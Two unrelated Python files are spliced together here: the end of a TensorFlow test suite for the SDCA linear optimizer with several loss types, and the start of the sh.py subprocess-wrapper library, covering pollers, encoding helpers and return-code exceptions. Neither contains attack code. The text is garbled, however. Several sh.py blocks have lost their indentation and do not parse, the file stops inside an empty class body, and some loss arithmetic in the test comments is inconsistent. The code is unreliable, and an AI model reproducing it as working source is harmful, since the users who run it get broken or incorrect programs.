      #   w_2* = w_4* = 2 \cdot s_2 y_2/(\lambda + 8 s_2).
      # Equivalently, due to regularization and example weights, the
      # predictions are within 8 \cdot s_i /(\lambda + 8 \cdot s_i) of the
      # labels.
      self.assertAllClose(
          [-10 * 40.0 / 41.0, 14.0 * 24 / 25.0], predictions.eval(), atol=0.01)

  def testDenseFeaturesWithDefaultWeights(self):
    """Dense features with unit example weights hit the closed-form optimum."""
    with self._single_threaded_test_session():
      examples, variables = make_dense_examples_and_variables_dicts(
          dense_features_values=[[[1.0], [0.0]], [0.0, 1.0]],
          weights=[1.0, 1.0],
          labels=[10.0, -5.0])
      options = dict(
          symmetric_l2_regularization=1.0,
          symmetric_l1_regularization=0,
          loss_type='squared_loss')
      lr = _SDCAModel(examples, variables, options)
      variables_lib.global_variables_initializer().run()
      predictions = lr.predictions(examples)

      train_op = lr.minimize()
      for _ in range(_MAX_ITERATIONS):
        train_op.run()
      lr.update_weights(train_op).run()

      # The loss function for these particular features is given by:
      #   1/2(label_1-w_1)^2 + 1/2(label_2-w_2)^2 + \lambda/2 (w_1^2 + w_2^2).
      # So, differentiating wrt to w_1, w_2 yields the following optimal
      # values:
      #   w_1* = label_1/(\lambda + 1) = 10/2, w_2* = label_2/(\lambda + 1) = -5/2.
      # In this case the (unnormalized regularized) loss will be:
      #   1/2(10-5)^2 + 1/2(5-5/2)^2 + 1/2(5^2 + (5/2)^2) = 125.0/4. The actual
      # loss should be further normalized by the sum of example weights.
      self.assertAllClose([5.0, -2.5], predictions.eval(), rtol=0.01)
      loss = lr.regularized_loss(examples)
      self.assertAllClose(125.0 / 8.0, loss.eval(), atol=0.01)

  def testDenseFeaturesWithArbitraryWeights(self):
    """Dense features with unequal example weights hit the weighted optimum."""
    with self._single_threaded_test_session():
      examples, variables = make_dense_examples_and_variables_dicts(
          dense_features_values=[[[1.0, 0.0], [0.0, 1.0]]],
          weights=[20.0, 10.0],
          labels=[10.0, -5.0])
      options = dict(
          symmetric_l2_regularization=5.0,
          symmetric_l1_regularization=0,
          loss_type='squared_loss')
      lr = _SDCAModel(examples, variables, options)
      variables_lib.global_variables_initializer().run()
      predictions = lr.predictions(examples)

      train_op = lr.minimize()
      for _ in range(_MAX_ITERATIONS):
        train_op.run()
      lr.update_weights(train_op).run()

      # The loss function for these particular features is given by:
      #   1/2 s_1 (label_1-w_1)^2 + 1/2 s_2(label_2-w_2)^2 +
      #   \lambda/2 (w_1^2 + w_2^2)
      # where s_1, s_2 are the *example* weights. It turns out that the optimal
      # (variable) weights are given by:
      #   w_1* = label_1 \cdot s_1/(\lambda + s_1) = 8.0 and
      #   w_2* = label_2 \cdot s_2/(\lambda + s_2) = -10/3.
      # In this case the (unnormalized regularized) loss will be:
      #   s_1/2(8-10)^2 + s_2/2(5-10/3)^2 + 5.0/2(8^2 + (10/3)^2) = 2175.0/9.
      # The actual loss should be further normalized by the sum of example
      # weights.
      self.assertAllClose([8.0, -10.0 / 3], predictions.eval(), rtol=0.01)
      loss = lr.regularized_loss(examples)
      self.assertAllClose(2175.0 / 270.0, loss.eval(), atol=0.01)
# ResourceVariable only runs in graph mode
@test_util.deprecated_graph_mode_only
class SdcaWithHingeLossTest(_SDCAModelTest):
  """SDCA optimizer test class for hinge loss."""

  def testSimple(self):
    """Hinge loss separates two one-hot examples perfectly."""
    # Setup test data
    example_protos = [
        make_example_proto({
            'age': [0],
            'gender': [0]
        }, 0),
        make_example_proto({
            'age': [1],
            'gender': [1]
        }, 1),
    ]
    example_weights = [1.0, 1.0]
    with self._single_threaded_test_session():
      examples = make_example_dict(example_protos, example_weights)
      variables = make_variable_dict(1, 1)
      options = dict(
          symmetric_l2_regularization=1.0,
          symmetric_l1_regularization=0,
          loss_type='hinge_loss')
      model = _SDCAModel(examples, variables, options)
      variables_lib.global_variables_initializer().run()

      # Before minimization, the weights default to zero. There is no loss due
      # to regularization, only unregularized loss which is 0.5 * (1+1) = 1.0.
      predictions = model.predictions(examples)
      self.assertAllClose([0.0, 0.0], predictions.eval())
      unregularized_loss = model.unregularized_loss(examples)
      regularized_loss = model.regularized_loss(examples)
      self.assertAllClose(1.0, unregularized_loss.eval())
      self.assertAllClose(1.0, regularized_loss.eval())

      # After minimization, the model separates perfectly the data points.
      # There are 4 sparse weights: 2 for age (say w1, w2) and 2 for gender
      # (say w3 and w4). Solving the system w1 + w3 = 1.0, w2 + w4 = -1.0 and
      # minimizing wrt to \|\vec{w}\|_2, gives w1=w3=1/2 and w2=w4=-1/2. This
      # gives 0.0 unregularized loss and 0.25 L2 loss.
      train_op = model.minimize()
      for _ in range(_MAX_ITERATIONS):
        train_op.run()
      model.update_weights(train_op).run()

      binary_predictions = get_binary_predictions_for_hinge(predictions)
      self.assertAllEqual([-1.0, 1.0], predictions.eval())
      self.assertAllEqual([0, 1], binary_predictions.eval())
      self.assertAllClose(0.0, unregularized_loss.eval())
      self.assertAllClose(0.25, regularized_loss.eval(), atol=0.05)

  def testDenseFeaturesPerfectlySeparable(self):
    """Hinge loss on perfectly separable dense data gives ~0 loss."""
    with self._single_threaded_test_session():
      examples, variables = make_dense_examples_and_variables_dicts(
          dense_features_values=[[1.0, 1.0], [1.0, -1.0]],
          weights=[1.0, 1.0],
          labels=[1.0, 0.0])
      options = dict(
          symmetric_l2_regularization=1.0,
          symmetric_l1_regularization=0,
          loss_type='hinge_loss')
      model = _SDCAModel(examples, variables, options)
      variables_lib.global_variables_initializer().run()
      predictions = model.predictions(examples)
      binary_predictions = get_binary_predictions_for_hinge(predictions)

      train_op = model.minimize()
      for _ in range(_MAX_ITERATIONS):
        train_op.run()
      model.update_weights(train_op).run()

      self.assertAllClose([1.0, -1.0], predictions.eval(), atol=0.05)
      self.assertAllEqual([1, 0], binary_predictions.eval())

      # (1.0, 1.0) and (1.0, -1.0) are perfectly separable by x-axis (that is,
      # the SVM's functional margin >=1), so the unregularized loss is ~0.0.
      # There is only loss due to l2-regularization. For these datapoints, it
      # turns out that w_1~=0.0 and w_2~=1.0 which means that l2 loss is ~0.25.
      unregularized_loss = model.unregularized_loss(examples)
      regularized_loss = model.regularized_loss(examples)
      self.assertAllClose(0.0, unregularized_loss.eval(), atol=0.02)
      self.assertAllClose(0.25, regularized_loss.eval(), atol=0.02)

  def testDenseFeaturesSeparableWithinMargins(self):
    """Points inside the margin incur hinge loss despite correct labels."""
    with self._single_threaded_test_session():
      examples, variables = make_dense_examples_and_variables_dicts(
          dense_features_values=[[[1.0, 0.5], [1.0, -0.5]]],
          weights=[1.0, 1.0],
          labels=[1.0, 0.0])
      options = dict(
          symmetric_l2_regularization=1.0,
          symmetric_l1_regularization=0,
          loss_type='hinge_loss')
      model = _SDCAModel(examples, variables, options)
      variables_lib.global_variables_initializer().run()
      predictions = model.predictions(examples)
      binary_predictions = get_binary_predictions_for_hinge(predictions)

      train_op = model.minimize()
      for _ in range(_MAX_ITERATIONS):
        train_op.run()
      model.update_weights(train_op).run()

      # (1.0, 0.5) and (1.0, -0.5) are separable by x-axis but the datapoints
      # are within the margins so there is unregularized loss (1/2 per
      # example). For these datapoints, optimal weights are w_1~=0.0 and
      # w_2~=1.0 which gives an L2 loss of ~0.25.
      self.assertAllClose([0.5, -0.5], predictions.eval(), rtol=0.05)
      self.assertAllEqual([1, 0], binary_predictions.eval())
      unregularized_loss = model.unregularized_loss(examples)
      regularized_loss = model.regularized_loss(examples)
      self.assertAllClose(0.5, unregularized_loss.eval(), atol=0.02)
      self.assertAllClose(0.75, regularized_loss.eval(), atol=0.02)

  def testDenseFeaturesWeightedExamples(self):
    """A heavier example pushes the decision boundary toward the lighter one."""
    with self._single_threaded_test_session():
      examples, variables = make_dense_examples_and_variables_dicts(
          dense_features_values=[[[1.0], [1.0]], [[0.5], [-0.5]]],
          weights=[3.0, 1.0],
          labels=[1.0, 0.0])
      options = dict(
          symmetric_l2_regularization=1.0,
          symmetric_l1_regularization=0,
          loss_type='hinge_loss')
      model = _SDCAModel(examples, variables, options)
      variables_lib.global_variables_initializer().run()
      predictions = model.predictions(examples)
      binary_predictions = get_binary_predictions_for_hinge(predictions)
      train_op = model.minimize()
      for _ in range(_MAX_ITERATIONS):
        train_op.run()
      model.update_weights(train_op).run()

      # Point (1.0, 0.5) has higher weight than (1.0, -0.5) so the model will
      # try to increase the margin from (1.0, 0.5). Due to regularization,
      # (1.0, -0.5) will be within the margin. For these points and example
      # weights, the optimal weights are w_1~=0.4 and w_2~=1.2 which give an L2
      # loss of 0.5 * 0.25 * 0.25 * 1.6 = 0.2. The binary predictions will be
      # correct, but the boundary will be much closer to the 2nd point than the
      # first one.
      self.assertAllClose([1.0, -0.2], predictions.eval(), atol=0.05)
      self.assertAllEqual([1, 0], binary_predictions.eval())
      unregularized_loss = model.unregularized_loss(examples)
      regularized_loss = model.regularized_loss(examples)
      self.assertAllClose(0.2, unregularized_loss.eval(), atol=0.02)
      self.assertAllClose(0.4, regularized_loss.eval(), atol=0.02)
# ResourceVariable only runs in graph mode
@test_util.deprecated_graph_mode_only
class SdcaWithSmoothHingeLossTest(_SDCAModelTest):
  """SDCA optimizer test class for smooth hinge loss."""

  def testSimple(self):
    """Smooth hinge loss converges to w=+-1/3 on two one-hot examples."""
    # Setup test data
    example_protos = [
        make_example_proto({
            'age': [0],
            'gender': [0]
        }, 0),
        make_example_proto({
            'age': [1],
            'gender': [1]
        }, 1),
    ]
    example_weights = [1.0, 1.0]
    with self._single_threaded_test_session():
      examples = make_example_dict(example_protos, example_weights)
      variables = make_variable_dict(1, 1)
      options = dict(
          symmetric_l2_regularization=1.0,
          symmetric_l1_regularization=0,
          loss_type='smooth_hinge_loss')
      model = _SDCAModel(examples, variables, options)
      variables_lib.global_variables_initializer().run()

      # Before minimization, the weights default to zero. There is no loss due
      # to regularization, only unregularized loss which is 0.5 * (1+1) = 1.0.
      predictions = model.predictions(examples)
      self.assertAllClose([0.0, 0.0], predictions.eval())
      unregularized_loss = model.unregularized_loss(examples)
      regularized_loss = model.regularized_loss(examples)
      self.assertAllClose(1.0, unregularized_loss.eval())
      self.assertAllClose(1.0, regularized_loss.eval())

      # After minimization, the model separates perfectly the data points.
      # There are 4 sparse weights: 2 for age (say w1, w2) and 2 for gender
      # (say w3 and w4). The minimization leads to w1=w3=1/3 and w2=w4=-1/3.
      # This gives an unregularized hinge loss of 0.33 and a 0.11 L2 loss.
      train_op = model.minimize()
      for _ in range(_MAX_ITERATIONS):
        train_op.run()
      model.update_weights(train_op).run()

      binary_predictions = get_binary_predictions_for_hinge(predictions)
      self.assertAllClose([-0.67, 0.67], predictions.eval(), atol=0.05)
      self.assertAllEqual([0, 1], binary_predictions.eval())
      self.assertAllClose(0.33, unregularized_loss.eval(), atol=0.02)
      self.assertAllClose(0.44, regularized_loss.eval(), atol=0.02)
# ResourceVariable only runs in graph mode
@test_util.deprecated_graph_mode_only
class SdcaWithPoissonLossTest(_SDCAModelTest):
  """SDCA optimizer test class for poisson loss."""

  def testSimple(self):
    """Poisson loss converges to per-weight argmin values on count labels."""
    # Setup test data
    example_protos = [
        make_example_proto({
            'age': [0],
            'gender': [0]
        }, 0),
        make_example_proto({
            'age': [1],
            'gender': [1]
        }, 2),
    ]
    example_weights = [100.0, 100.0]
    with self._single_threaded_test_session():
      examples = make_example_dict(example_protos, example_weights)
      variables = make_variable_dict(1, 1)
      options = dict(
          symmetric_l2_regularization=1.0,
          symmetric_l1_regularization=0,
          loss_type='poisson_loss')
      model = _SDCAModel(examples, variables, options)
      variables_lib.global_variables_initializer().run()

      # Before minimization, the weights default to zero. There is no loss due
      # to regularization, only unregularized loss which is 1 for each example.
      predictions = model.predictions(examples)
      self.assertAllClose([1.0, 1.0], predictions.eval())
      unregularized_loss = model.unregularized_loss(examples)
      regularized_loss = model.regularized_loss(examples)
      approximate_duality_gap = model.approximate_duality_gap()
      self.assertAllClose(1.0, unregularized_loss.eval())
      self.assertAllClose(1.0, regularized_loss.eval())

      # There are 4 sparse weights: 2 for age (say w1, w2) and 2 for gender
      # (say w3 and w4). The minimization leads to:
      #   w1=w3=-1.96487, argmin of 100*(exp(2*w)-2*w*0)+w**2.
      #   w2=w4=0.345708, argmin of 100*(exp(2*w)-2*w*2)+w**2.
      # This gives an unregularized loss of .3167 and .3366 with regularization.
      train_op = model.minimize()
      for _ in range(_MAX_ITERATIONS):
        train_op.run()
      model.update_weights(train_op).run()

      self.assertAllClose([0.0196, 1.9965], predictions.eval(), atol=1e-4)
      self.assertAllClose(0.3167, unregularized_loss.eval(), atol=1e-4)
      self.assertAllClose(0.3366, regularized_loss.eval(), atol=1e-4)
      self.assertAllClose(0., approximate_duality_gap.eval(), atol=1e-6)
class SdcaFprintTest(_SDCAModelTest):
  """Tests for the SdcaFprint op.

  This is one way of enforcing the platform-agnostic nature of SdcaFprint.
  Basically we are checking against exact values and this test could be running
  across different platforms. Note that it is fine for expected values to change
  in the future, if the implementation of SdcaFprint changes (ie this is *not* a
  frozen test).
  """

  def testFprint(self):
    with self._single_threaded_test_session():
      in_data = constant_op.constant(['abc', 'very looooooong string', 'def'])
      out_data = gen_sdca_ops.sdca_fprint(in_data)
      # Each input string maps to a deterministic 128-bit fingerprint,
      # expressed as a pair of int64 halves.
      self.assertAllEqual([[4143508125394299908, -6879828354153669051],
                           [5849691694103072671, -4874542629849009556],
                           [603227410218889250, 8762207001949257490]],
                          self.evaluate(out_data))
class _SparseFeatureColumnTest(TensorFlowTestCase):
  """Tests for _SparseFeatureColumn.
  """

  def testBasic(self):
    expected_example_indices = [1, 1, 1, 2]
    expected_feature_indices = [0, 1, 2, 0]
    # With feature_values=None the column stores indices only and
    # feature_values stays None (it is not converted to a Tensor).
    sfc = _SparseFeatureColumn(expected_example_indices,
                               expected_feature_indices, None)
    self.assertTrue(isinstance(sfc.example_indices, ops.Tensor))
    self.assertTrue(isinstance(sfc.feature_indices, ops.Tensor))
    self.assertEqual(sfc.feature_values, None)
    with self.cached_session():
      self.assertAllEqual(
          expected_example_indices,
          self.evaluate(sfc.example_indices))
      self.assertAllEqual(
          expected_feature_indices,
          self.evaluate(sfc.feature_indices))
    # When explicit feature values are supplied, they round-trip unchanged.
    expected_feature_values = [1.0, 2.0, 3.0, 4.0]
    sfc = _SparseFeatureColumn([1, 1, 1, 2], [0, 1, 2, 0],
                               expected_feature_values)
    with self.cached_session():
      self.assertAllEqual(
          expected_feature_values,
          self.evaluate(sfc.feature_values))
# Run all test cases in this module when executed directly.
if __name__ == '__main__':
  googletest.main()
|
sh.py | """
http://amoffat.github.io/sh/
"""
# ===============================================================================
# Copyright (C) 2011-2020 by Andrew Moffat
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# ===============================================================================
__version__ = "1.14.1"
__project_url__ = "https://github.com/amoffat/sh"
from collections import deque
try:
from collections.abc import Mapping
except ImportError:
from collections import Mapping
from contextlib import contextmanager
from functools import partial
from io import UnsupportedOperation, open as fdopen
from locale import getpreferredencoding
from types import ModuleType, GeneratorType
import ast
import errno
import fcntl
import gc
import getpass
import glob as glob_module
import inspect
import logging
import os
import platform
import pty
import pwd
import re
import select
import signal
import stat
import struct
import sys
import termios
import threading
import time
import traceback
import tty
import warnings
import weakref
# interpreter version flags driving the py2/py3 compatibility branches below
IS_PY3 = sys.version_info[0] == 3
MINOR_VER = sys.version_info[1]
IS_PY26 = sys.version_info[0] == 2 and MINOR_VER == 6
# string/bytes IO types and the queue module live in different places on py2
# and py3; normalize the names here so the rest of the module can use them
# uniformly
if IS_PY3:
    from io import StringIO
    ioStringIO = StringIO
    from io import BytesIO as cStringIO
    iocStringIO = cStringIO
    from queue import Queue, Empty

    # for some reason, python 3.1 removed the builtin "callable", wtf
    if not hasattr(__builtins__, "callable"):
        def callable(ob):
            return hasattr(ob, "__call__")
else:
    from StringIO import StringIO
    from cStringIO import OutputType as cStringIO
    from io import StringIO as ioStringIO
    from io import BytesIO as iocStringIO
    from Queue import Queue, Empty
try:
    from shlex import quote as shlex_quote  # here from 3.3 onward
except ImportError:
    from pipes import quote as shlex_quote  # undocumented before 2.7

# sh relies on fork/exec, ptys and posix signals, so fail loudly at import
# time on windows rather than breaking mysteriously later
if "windows" in platform.system().lower():  # pragma: no cover
    raise ImportError("sh %s is currently only supported on linux and osx. \
please install pbs 0.110 (http://pypi.python.org/pypi/pbs) for windows \
support." % __version__)
DEFAULT_ENCODING = getpreferredencoding() or "UTF-8"

# NOTE(review): despite the name, this flag is also True on AIX -- confirm
# whether grouping AIX with Darwin here is intentional
IS_MACOS = platform.system() in ("AIX", "Darwin")
THIS_DIR = os.path.dirname(os.path.realpath(__file__))
SH_LOGGER_NAME = __name__

# normally i would hate this idea of using a global to signify whether we are
# running tests, because it breaks the assumption that what is running in the
# tests is what will run live, but we ONLY use this in a place that has no
# serious side-effects that could change anything. as long as we do that, it
# should be ok
RUNNING_TESTS = bool(int(os.environ.get("SH_TESTS_RUNNING", "0")))
FORCE_USE_SELECT = bool(int(os.environ.get("SH_TESTS_USE_SELECT", "0")))

# a re-entrant lock for pushd. this way, multiple threads that happen to use
# pushd will all see the current working directory for the duration of the
# with-context
PUSHD_LOCK = threading.RLock()
# inspect.getargspec is deprecated/removed on modern py3; choose whichever
# introspection API this interpreter provides
if hasattr(inspect, "getfullargspec"):
    def get_num_args(fn):
        # number of positional parameters declared by fn
        return len(inspect.getfullargspec(fn).args)
else:
    def get_num_args(fn):
        return len(inspect.getargspec(fn).args)
# alias the py2-only builtin names on py3 so the rest of the module can stay
# version-agnostic
if IS_PY3:
    raw_input = input
    unicode = str
    basestring = str
    long = int

# set of str/unicode method names; used to proxy string methods through
# RunningCommand.__getattr__
_unicode_methods = set(dir(unicode()))

HAS_POLL = hasattr(select, "poll")
# normalized event constants returned by Poller.poll()
POLLER_EVENT_READ = 1
POLLER_EVENT_WRITE = 2
POLLER_EVENT_HUP = 4
POLLER_EVENT_ERROR = 8
# here we use an use a poller interface that transparently selects the most
# capable poller (out of either select.select or select.poll). this was added
# by zhangyafeikimi when he discovered that if the fds created internally by sh
# numbered > 1024, select.select failed (a limitation of select.select). this
# can happen if your script opens a lot of files
if HAS_POLL and not FORCE_USE_SELECT:
    class Poller(object):
        """ select.poll()-backed poller. preferred because, unlike
        select.select(), it has no FD_SETSIZE (1024) limit on file
        descriptor numbers. """

        def __init__(self):
            self._poll = select.poll()
            # file descriptor <-> file object bidirectional maps
            self.fd_lookup = {}
            self.fo_lookup = {}

        def __nonzero__(self):
            # truthy while anything is registered (py2 bool protocol)
            return len(self.fd_lookup) != 0

        def __len__(self):
            return len(self.fd_lookup)

        def _set_fileobject(self, f):
            # f may be a file-like object or a raw integer fd; in the raw-fd
            # case both maps are keyed and valued by the fd itself
            if hasattr(f, "fileno"):
                fd = f.fileno()
                self.fd_lookup[fd] = f
                self.fo_lookup[f] = fd
            else:
                self.fd_lookup[f] = f
                self.fo_lookup[f] = f

        def _remove_fileobject(self, f):
            if hasattr(f, "fileno"):
                fd = f.fileno()
                del self.fd_lookup[fd]
                del self.fo_lookup[f]
            else:
                del self.fd_lookup[f]
                del self.fo_lookup[f]

        def _get_file_descriptor(self, f):
            return self.fo_lookup.get(f)

        def _get_file_object(self, fd):
            return self.fd_lookup.get(fd)

        def _register(self, f, events):
            # f can be a file descriptor or file object
            self._set_fileobject(f)
            fd = self._get_file_descriptor(f)
            self._poll.register(fd, events)

        def register_read(self, f):
            self._register(f, select.POLLIN | select.POLLPRI)

        def register_write(self, f):
            self._register(f, select.POLLOUT)

        def register_error(self, f):
            self._register(f, select.POLLERR | select.POLLHUP | select.POLLNVAL)

        def unregister(self, f):
            fd = self._get_file_descriptor(f)
            self._poll.unregister(fd)
            self._remove_fileobject(f)

        def poll(self, timeout):
            if timeout is not None:
                # convert from seconds to milliseconds
                timeout *= 1000
            changes = self._poll.poll(timeout)
            results = []
            # the elif chain means at most one event is reported per fd, with
            # read taking priority over write, then hup, then error
            for fd, events in changes:
                f = self._get_file_object(fd)
                if events & (select.POLLIN | select.POLLPRI):
                    results.append((f, POLLER_EVENT_READ))
                elif events & select.POLLOUT:
                    results.append((f, POLLER_EVENT_WRITE))
                elif events & select.POLLHUP:
                    results.append((f, POLLER_EVENT_HUP))
                elif events & (select.POLLERR | select.POLLNVAL):
                    results.append((f, POLLER_EVENT_ERROR))
            return results
else:
    class Poller(object):
        """ select.select()-based fallback poller, used when select.poll is
        unavailable (or when the tests force it via SH_TESTS_USE_SELECT). """

        def __init__(self):
            self.rlist = []
            self.wlist = []
            self.xlist = []

        def __nonzero__(self):
            return len(self.rlist) + len(self.wlist) + len(self.xlist) != 0

        def __len__(self):
            return len(self.rlist) + len(self.wlist) + len(self.xlist)

        @staticmethod
        def _register(f, events):
            # idempotent add
            if f not in events:
                events.append(f)

        @staticmethod
        def _unregister(f, events):
            if f in events:
                events.remove(f)

        def register_read(self, f):
            self._register(f, self.rlist)

        def register_write(self, f):
            self._register(f, self.wlist)

        def register_error(self, f):
            self._register(f, self.xlist)

        def unregister(self, f):
            self._unregister(f, self.rlist)
            self._unregister(f, self.wlist)
            self._unregister(f, self.xlist)

        def poll(self, timeout):
            _in, _out, _err = select.select(self.rlist, self.wlist, self.xlist, timeout)
            results = []
            for f in _in:
                results.append((f, POLLER_EVENT_READ))
            for f in _out:
                results.append((f, POLLER_EVENT_WRITE))
            for f in _err:
                results.append((f, POLLER_EVENT_ERROR))
            return results
def encode_to_py3bytes_or_py2str(s):
    """ takes anything and attempts to return a py2 string or py3 bytes. this
    is typically used when creating command + arguments to be executed via
    os.exec* """
    fallback_encoding = "utf8"

    if IS_PY3:
        # already bytes?  nothing to do
        if isinstance(s, bytes):
            return s
        text = str(s)
        try:
            return bytes(text, DEFAULT_ENCODING)
        except UnicodeEncodeError:
            return bytes(text, fallback_encoding)

    # py2: first coerce to unicode from the system's encoding
    try:
        as_unicode = unicode(s, DEFAULT_ENCODING)
    except TypeError:
        # the thing is already unicode, or it's a number, so it can't be
        # coerced with an encoding argument; without one it converts to a
        # string, then to unicode
        as_unicode = unicode(s)

    # now that unicode is guaranteed, encode back to the system encoding,
    # with a lossy utf8 fallback
    try:
        return as_unicode.encode(DEFAULT_ENCODING)
    except UnicodeEncodeError:
        return as_unicode.encode(fallback_encoding, "replace")
def _indent_text(text, num=4):
lines = []
for line in text.split("\n"):
line = (" " * num) + line
lines.append(line)
return "\n".join(lines)
class ForkException(Exception):
    # wraps an exception that occurred in the forked child (before exec),
    # passed in as already-formatted traceback text so it can be surfaced in
    # the parent process
    def __init__(self, orig_exc):
        # orig_exc is a string; it gets indented for readable display
        tmpl = """

Original exception:
===================

%s
"""
        msg = tmpl % _indent_text(orig_exc)
        Exception.__init__(self, msg)
class ErrorReturnCodeMeta(type):
    """ a metaclass which provides the ability for an ErrorReturnCode (or
    derived) instance, imported from one sh module, to be considered the
    subclass of ErrorReturnCode from another module. this is mostly necessary
    in the tests, where we do assertRaises, but the ErrorReturnCode that the
    program we're testing throws may not be the same class that we pass to
    assertRaises
    """
    def __subclasscheck__(self, o):
        # same class name counts as a match, regardless of which module
        # created the class object
        if o.__name__ == self.__name__:
            return True
        # so does having a base class with our name
        base_names = set(b.__name__ for b in o.__bases__)
        return self.__name__ in base_names
class ErrorReturnCode(Exception):
    __metaclass__ = ErrorReturnCodeMeta
    """ base class for all exceptions as a result of a command's exit status
    being deemed an error. this base class is dynamically subclassed into
    derived classes with the format: ErrorReturnCode_NNN where NNN is the exit
    code number. the reason for this is it reduces boiler plate code when
    testing error return codes:

        try:
            some_cmd()
        except ErrorReturnCode_12:
            print("couldn't do X")

    vs:
        try:
            some_cmd()
        except ErrorReturnCode as e:
            if e.exit_code == 12:
                print("couldn't do X")

    it's not much of a savings, but i believe it makes the code easier to read """

    # max bytes of each captured stream embedded in the exception message;
    # the full data remains available on e.stdout / e.stderr
    truncate_cap = 750

    def __reduce__(self):
        # pickling support: rebuild from the constructor arguments
        return self.__class__, (self.full_cmd, self.stdout, self.stderr, self.truncate)

    def __init__(self, full_cmd, stdout, stderr, truncate=True):
        self.full_cmd = full_cmd
        self.stdout = stdout
        self.stderr = stderr
        self.truncate = truncate

        def abbreviate(stream, suffix_tmpl):
            # cap a stream at truncate_cap bytes, appending a note about how
            # many bytes were dropped
            shown = stream
            if truncate:
                shown = shown[:self.truncate_cap]
            dropped = len(stream) - len(shown)
            if dropped:
                shown += (suffix_tmpl % dropped).encode()
            return shown

        exc_stdout = abbreviate(self.stdout, "... (%d more, please see e.stdout)")
        exc_stderr = abbreviate(self.stderr, "... (%d more, please see e.stderr)")

        msg_tmpl = unicode("\n\n RAN: {cmd}\n\n STDOUT:\n{stdout}\n\n STDERR:\n{stderr}")
        msg = msg_tmpl.format(
            cmd=self.full_cmd,
            stdout=exc_stdout.decode(DEFAULT_ENCODING, "replace"),
            stderr=exc_stderr.decode(DEFAULT_ENCODING, "replace")
        )

        if not IS_PY3:
            # Exception messages should be treated as an API which takes native str type on both
            # Python2 and Python3. (Meaning, it's a byte string on Python2 and a text string on
            # Python3)
            msg = encode_to_py3bytes_or_py2str(msg)

        super(ErrorReturnCode, self).__init__(msg)
class SignalException(ErrorReturnCode):
    # base for the dynamically-created SignalException_* classes raised when a
    # process exits due to a signal instead of a normal exit code
    pass
class TimeoutException(Exception):
    """ raised when a command is killed for exceeding a timeout -- either the
    `_timeout` special kwarg given at launch, or a timeout passed to
    RunningCommand.wait(timeout) """
    def __init__(self, exit_code, full_cmd):
        # exit_code may be None when the wait()-level timeout fired before
        # the process resolved
        self.exit_code = exit_code
        self.full_cmd = full_cmd
        # note: deliberately skips ErrorReturnCode-style message building
        super(Exception, self).__init__()
# when a process dies from one of these signals, sh raises the matching
# SignalException_* subclass instead of silently returning the exit status
SIGNALS_THAT_SHOULD_THROW_EXCEPTION = set((
    signal.SIGABRT,
    signal.SIGBUS,
    signal.SIGFPE,
    signal.SIGILL,
    signal.SIGINT,
    signal.SIGKILL,
    signal.SIGPIPE,
    signal.SIGQUIT,
    signal.SIGSEGV,
    signal.SIGTERM,
    signal.SIGSYS,
))
# we subclass AttributeError because:
# https://github.com/ipython/ipython/issues/2577
# https://github.com/amoffat/sh/issues/97#issuecomment-10610629
class CommandNotFound(AttributeError):
    # raised when a program cannot be resolved to an executable path
    pass
# matches the dynamically-generated exception names, e.g. "ErrorReturnCode_1",
# "SignalException_9" or "SignalException_SIGHUP"
rc_exc_regex = re.compile(r"(ErrorReturnCode|SignalException)_((\d+)|SIG[a-zA-Z]+)")
# cache of dynamically-created exception classes, so a given code always maps
# to the same class object (identity is preserved)
rc_exc_cache = {}
# signal number -> canonical signal name, e.g. {9: "SIGKILL", ...}
SIGNAL_MAPPING = dict([(v, k) for k, v in signal.__dict__.items() if re.match(r"SIG[a-zA-Z]+", k)])
def get_exc_from_name(name):
    """ takes an exception name, like:

        ErrorReturnCode_1
        SignalException_9
        SignalException_SIGHUP

    and returns the corresponding exception class (or None if the name does
    not look like one of ours). this is primarily used for importing
    exceptions from sh into user code, for instance, to capture those
    exceptions """
    exc = None
    try:
        return rc_exc_cache[name]
    except KeyError:
        m = rc_exc_regex.match(name)
        if m:
            base = m.group(1)
            rc_or_sig_name = m.group(2)
            if base == "SignalException":
                try:
                    rc = -int(rc_or_sig_name)
                except ValueError:
                    # symbolic name like "SIGHUP" -- resolve via the signal module
                    rc = -getattr(signal, rc_or_sig_name)
            else:
                rc = int(rc_or_sig_name)
            exc = get_rc_exc(rc)
            # fix: also cache under the requested *name*. previously the cache
            # was only ever populated with integer exit-code keys (inside
            # get_rc_exc), so the name lookup above could never hit.
            rc_exc_cache[name] = exc
    return exc
def get_rc_exc(rc):
    """ takes a exit code or negative signal number and produces the matching
    exception class. positive return codes yield an ErrorReturnCode subclass,
    negative return codes yield a SignalException subclass.

    generated classes are cached so only one class per code exists,
    preserving identity """
    cached = rc_exc_cache.get(rc)
    if cached is not None:
        return cached

    if rc >= 0:
        name = "ErrorReturnCode_%d" % rc
        base = ErrorReturnCode
    else:
        name = "SignalException_" + SIGNAL_MAPPING[abs(rc)]
        base = SignalException

    exc = ErrorReturnCodeMeta(name, (base,), {"exit_code": rc})
    rc_exc_cache[rc] = exc
    return exc
# we monkey patch glob. i'm normally generally against monkey patching, but i
# decided to do this really un-intrusive patch because we need a way to detect
# if a list that we pass into an sh command was generated from glob. the reason
# being that glob returns an empty list if a pattern is not found, and so
# commands will treat the empty list as no arguments, which can be a problem,
# ie:
#
#   ls(glob("*.ojfawe"))
#
# ^ will show the contents of your home directory, because it's essentially
# running ls([]) which, as a process, is just "ls".
#
# so we subclass list and monkey patch the glob function. nobody should be the
# wiser, but we'll have results that we can make some determinations on
_old_glob = glob_module.glob

class GlobResults(list):
    # a list that remembers the glob pattern that produced it, letting sh
    # distinguish "empty glob result" from "no arguments at all"
